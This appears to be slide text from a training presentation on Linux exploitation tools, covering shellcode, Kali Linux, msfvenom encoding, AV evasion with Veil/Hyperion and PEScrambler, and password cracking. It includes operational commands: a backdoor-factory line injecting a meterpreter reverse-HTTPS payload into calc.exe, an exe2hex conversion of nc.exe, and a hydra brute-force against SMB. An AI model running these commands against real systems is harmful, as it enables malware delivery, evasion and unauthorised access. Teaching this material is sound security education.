Linux Exploitation Tools 1LT George Raileanu

Linux Exploitation Tools Shellcode – Piece of code used as the payload in the exploitation of a software vulnerability. What is a payload? What is an exploit? What is a vulnerability? Reference: https://www.offensive-security.com/vulndev/aix-shellcode-metasploit/ Linux Exploitation Tools

Local Remote Staged Types of Shellcode

Kali Linux What is Kali Linux? Over 300 Programs Nmap Aircrck-ng Kismet Wireshark Metasploit Burp John the Ripper Maltego Armitage OWASP ZAP Reference: http://marthinsen.nu/?p=244 Kali Linux

Reference: http://www. quickmeme Metasploit

https://memegenerator.net/instance/50927099

using msfvenom to generate our shellcode:   -f c (format C / Windows) -a x86 (32 bit OS) -a x86_64 (64 bit OS) -b "\x00\x0a\x0d\x20" (exclude badchars) -e x86/shikata_ga_nai (encode the payload) BAD Characters:   0x00 == NULL Byte: NULL Bytes cause a STRCPY oper to terminate, which can truncate our buffer and ignore our shellcode. 0x0D == Carriage Return: would signify end of PASSWORD field, and terminate the buffer at that point. 0x0A == Line Feed: same reason as the carriage return. 0x20 == Spaces

using EXITFUNC=thread   we keep the system or service we exploited from crashing upon EXIT from our shell.

Exploit Obfuscation SAFE Veil Evasion Framework: ../veil-evasion/hyperion# wine hyperion.exe filein.exe fileout.exe ../veil-evasion/hyperion# mv fileout.exe ../pescrambler/ && cd ../pescrambler/ ../veil-evasion/pescrambler# wine PEScrambler.exe -i fileout.exe -o final.exe BackDoor-Factory: ../backdoor-factory/# ./backdoor.py -f calc.exe -s \ meterpreter_reverse_https_threaded -H <LHOST> -P <LPORT> # if encountered, never use a cave section named 'None'; if no caves are adequate use 'a' to append the backdoor to the binary. but with all the mitigations and prevention mechanisms installed on Win* OSs why would this work? EMET is largely effective at complicating a variety of exploitation techniques in true 32- and 64-bit applications, often requiring attackers to find a solution to each mitigation on a caseby-case basis. Most off-the-shelf exploits will fail in the face of EMET mitigations, however, while EMET provides support for both 32 and 64-bit processes, as a limitation of its design, it does not explicitly handle the special case of WoW64 processes. This makes using a 64-bit ROP chain and secondary stage a relatively straightforward method for bypassing a significant number of EMET’s mitigations. Furthermore, 64-bit editions of EMET do not support any of the ROP-related mitigations.

EXE2HEX: ../exe2hex/# python3 exe2hex.py -x /tmp/safe.exe ../exe2hex/# ./exe2hex.py -x /tmp/nc.exe -b /tmp/safe.txt ../exe2hex/# cat /tmp/calc.exe | python3 exe2hex.py -s -b safe.bat -p safe.cmd Methods/OS Support • DEBUG.exe (BATch mode -b ) ◦Every version of Windows x86 (No x64 support). ◦Useful for legacy ver of Windows (e.g. XP/2000). ◦limitation of 64k file size for binary files. • PowerShell (PoSh mode -p ) ◦Supports both Windows x86 & x64. ◦Aimed at more "recent" versions of Windows. ◦Powershell was first integrated into core OS with Windows 7/Windows Server 2008 R2. ◦Windows XP SP2, Windows Server 2003 & Windows Vista requires PowerShell to be pre-installed. ◦This is not a .ps1 file (pure powershell). It only calls powershell at the end to convert.

Password Cracking: Password Guessing: Rainbow Tables: Obtain encrypted/hashed passwords, and guess, decrypt, or compare on offline system. Usually much faster than password guessing. Password Guessing: Attempts to actually login to target system . . Likely generates alot of traffic and logs, and likely to lockout attempted user account(s). Much slower than pass cracking. Rainbow Tables: Reference: https://memegenerator.net/instance/59512480

SALT SALT Edit the password algorithm used in Linux: $ nano /etc/pam.d/common-pasword we can change it to sha256, sha512, etc. $ openssl passwd -1 salt ABCD1234 password SALT SALT

hydra -L users.txt -P passwords.txt -v -o out 192.168.217.192 smb